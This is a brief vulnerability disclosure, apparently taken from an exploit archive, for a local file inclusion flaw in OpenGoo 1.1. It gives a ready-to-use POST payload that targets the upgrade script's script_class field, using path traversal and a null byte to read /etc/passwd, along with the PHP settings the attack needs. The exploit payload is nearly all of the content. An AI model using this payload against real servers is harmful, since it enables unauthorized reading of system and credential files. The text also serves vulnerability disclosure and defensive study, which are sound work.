id: 4726
date: 01/25/2009
title: OpenGoo 1.1 (script_class) Local File Inclusion Vulnerability
author: fuzion
cves: 

=============================================================
OpenGoo 1.1 (script_class) Local File Inclusion Vulnerability
=============================================================


OpenGoo 1.1 Local File Inclusion
http://www.opengoo.org/

magic_quotes_gpc = Off
register_globals = On

http://site/opengoo/public/upgrade/index.php
POST: form_data[script_class]=/../../../../../../../../../../../etc/passwd%00.html

Author Notified: Jan. 18




#  0day.today [2023-03-26]  #